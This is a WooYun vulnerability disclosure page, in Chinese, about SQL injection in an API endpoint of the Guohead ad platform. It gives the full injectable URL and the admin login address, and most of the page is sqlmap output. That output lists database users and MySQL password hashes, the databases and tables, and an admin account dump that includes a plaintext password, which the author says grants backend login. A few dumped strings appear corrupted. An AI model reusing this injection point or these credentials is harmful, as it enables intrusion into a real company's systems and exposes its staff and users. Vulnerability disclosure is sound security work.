当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095162

漏洞标题:果合网某处注入数据库为root权限

相关厂商:果合网

漏洞作者: sky

提交时间:2015-02-02 12:59

修复时间:2015-03-19 13:00

公开时间:2015-03-19 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入,很渣

详细说明:

注入点:http://api.mix.guohead.com/stats_app_activity.php?spid=a85a279e38364d17&client=1&gh_ver=2.0.5&app_pkg=com.ejiuwu.qpbuyu&app_ver=3.2.2&mac=020000000000&open_udid=8ec4d374f19ec87dfd632d448e6e30e42616c9f8&pmodel=iPhone7,2&wifi=1&adid=B494BDA4-C71A-44F9-A858-AC2891C230E4&is_ad_track_enabled=1&vendor_id=F469C05D-BC41-481B-ABB1-8B330ACB180B&width=568.000000&height=320.000000&os_lang=zh_CN&os_ver=8.1.2&jailbreak=1&app_dev_fml=1,2&a1=misd&a2=assertiond&a3=discoveryd&a4=fairplayd.H2&a5=cfprefsd&a6=seld&a7=discoveryd_helpe&a8=passd&a9=biometrickitd&a10=nfcd&a11=searchd&a12=nsurlsessiond&a13=InCallService&a14=bird&a15=MobileSMS&a16=ReportCrash&a17=cloudphotod&a18=cloudd&a19=coreduetd&a20=assistant_servic&a21=nsurlstoraged&a22=pkd&a23=QQ&a24=coreauthd&a25=DuetHeuristic-BM&a26=WirelessRadioMan&a27=awdd&a28=CoreAuthUI&a29=lsuseractivityd&a30=MicroMessenger&a31=rtcreportingd&a32=coresymbolicatio&a33=diagnosticd&a34=com.apple.sbd&a35=absd&a36=misagent&a37=pipelined&a38=IMDPersistenceAg&a39=CacheDeleteDaily&a40=com.apple.lakitu&a41=vvebo&a42=%C3%82%C3%A7%C3%89%C3%81%C3%87%C3%86%C3%8A%C3%A7%C3%AF%C3%88%C2%B1%C2%BA&a43=Preferences&a44=nehelper&a45=MobileSafari&a46=com.apple.WebKit&a47=com.apple.WebKit&a48=qpbuyu&a49=gamecontrollerd&a50=ReportCrash&a51=xpcproxy&initial=1
找到一个登录的地址,http://www.guohead.com/admin/login

漏洞证明:

注入出来的内容

database management system users [7]:
[*] ''@'localhost'
[*] 'guohe'@'192.168.%'
[*] 'guohead'@'192.168.1.%'
[*] 'nagios'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
database management system users password hashes:
[*] [1]:
password hash: NULL
[*] guohe [1]:
password hash: *F0EF2DFB75DECAF7AF5A6FF3BCB9A892E1E01BEE
[*] guohead [1]:
password hash: *253F9D4A3524F18438FD5503DC57C02A48ABFFD0
[*] nagios [1]:
password hash: *7389421331C5A33D6D2E8C64E5150601291601DA
[*] root [1]:
password hash: NULL


密码破不了,不然可以进一步渗透

available databases [9]:
[*] guohead
[*] guoheadold
[*] guohemix
[*] information_schema
[*] mix_bi
[*] mysql
[*] performance_schema
[*] test
[*] x_blog


Database: x_blog
[11 tables]
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
Database: x_blog
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicepame |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+
admin_user.csv
root@kali:/usr/share/sqlmap/output/api.mix.guohead.com/dump/guohead# cat admin_user.csv
id,email,password,createTime
1,wozai_m_gh2@guohead.com,f130354a6535040a6983235}d538f3db,2010-12-06 06:29:20
2,wozai_m_gh3@guohead.com,guohe!wangxi@recool,2010-12-06 06:29:20


Database: guohemix
[88 tables]
+---------------------------------------+
| sysconfig |
| windo}s2marked |
| activity2aid |
| activity2obj |
| activity_ad |
| activity_apply |
| activity_recycle |
| admin_rechange_log |
| advertiser_ad |
| advertiser_info |
| android_xp_pop_setting |
| app_categpry_mapping |
| app_heartbeat |
| app_parter |
| app_pay_detail_as |
| app_pay_detail_cm |
| apps |
| apps_bak |
| apps_rank |
| apps_rank_cate |
| auto_mail |
| changelog |
| developer_api |
| device |
| dic_app_category |
| dic_campaign_order_rule |
| dic_campaign_orpe |
| dic_multiwall_list_style |
| dic_pay_type |
| fill_rate |
| friends |
| game_tag |
| game_tag_app_map |
| game_tag_category |
| last_action |
| market_circle_pool |
| member |
| member_findpwd |
| member_intval |
| member_pay_detail |
| member_payoff |
| member_payoff_detail |
| member_withdraw |
| member_withdraw_info |
| money_manger |
| multiwall_actiall_campaigns |
| multiwall_active |
| multiwall_appwall_campaigns_archive |
| multiwall_dev_income |
| multiwall_dev_income_archive |
| multiwall_dev_income_percent |
| multiwall_dev_income_percent_aryhive |
| multiwall_integral_consume_ios |
| multiwall_integral_detail_ios |
| multiwall_integral_rate |
| multiwall_integral_task |
| multiwall_liject |
| multiwall_list |
| multiwall_offerwall_campaigns |
| multiwall_offerwall_campaigns_archive |
| multiwall_offgin |
| multiwall_reward_delay |
| multiwall_stats |
| multiwall_stats_plugin |
| notice |
| pay_policy |
| pay_policy_archive |
| paylog_income |
| paylog_spread |
| payoff_poly |
| pm |
| pm_list |
| pm_notice |
| quantity_poly |
| sdk_activity_app_setting |
| stats |
| stats_dau |
| stats_nosdk |
| sys_plugin |
| system_notice |
| trade_market |
| union_pool |
| union_status |
| white_paper |
| white_paper_list |
| win_object |
| win_plugin |
| win_plugin_type |
+---------------------------------------+


利用上面爆出来的帐号密码可登录后台。。

7477828B-D642-4F52-85FB-633E460D2C00.png


修复方案:

过滤吧

版权声明:转载请注明来源 sky@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝